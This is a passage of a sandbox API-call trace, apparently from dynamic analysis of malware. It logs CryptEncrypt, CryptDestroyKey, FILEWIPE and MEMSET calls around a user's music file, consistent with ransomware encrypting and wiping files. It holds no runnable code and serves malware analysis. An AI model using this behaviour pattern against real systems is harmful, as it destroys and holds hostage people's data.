| out: lpMsg=0x6ae83c) returned 0 [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.092] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.092] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.092] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.092] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.092] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.093] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.093] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.093] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.093] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.093] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.093] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.093] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.093] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.094] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xd484, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xd490) returned 1 [0039.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.094] CharLowerBuffW (in: lpsz="byte[54417]", cchLength=0xb | out: lpsz="byte[54417]") returned 0xb [0039.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.096] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.096] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.096] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x942498*, pdwDataLen=0x6ae220*=0xd484, dwBufLen=0xd490 | out: pbData=0x942498*, pdwDataLen=0x6ae220*=0xd490) returned 1 [0039.097] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.097] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.097] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.098] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.099] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.099] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.099] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.099] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.099] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0039.099] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.106] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.106] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.107] CryptDestroyKey (hKey=0x7c2200) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.107] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.107] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.107] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.107] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.108] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.108] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.108] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.108] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.108] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.109] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.109] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.109] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.109] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.111] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.111] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\tHua2JefIhtOfCp.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4bcf0, ftCreationTime.dwHighDateTime=0x1d5bb71, ftLastAccessTime.dwLowDateTime=0x253ef3a0, ftLastAccessTime.dwHighDateTime=0x1d5c0d4, ftLastWriteTime.dwLowDateTime=0x253ef3a0, ftLastWriteTime.dwHighDateTime=0x1d5c0d4, nFileSizeHigh=0x0, nFileSizeLow=0xd484, dwReserved0=0x0, dwReserved1=0x777648, cFileName="tHua2JefIhtOfCp.m4a", cAlternateFileName="THUA2J~1.M4A")) returned 0x7c2100 [0039.111] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.111] CharLowerBuffW (in: lpsz="byte[54404]", cchLength=0xb | out: lpsz="byte[54404]") returned 0xb [0039.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.111] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.111] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 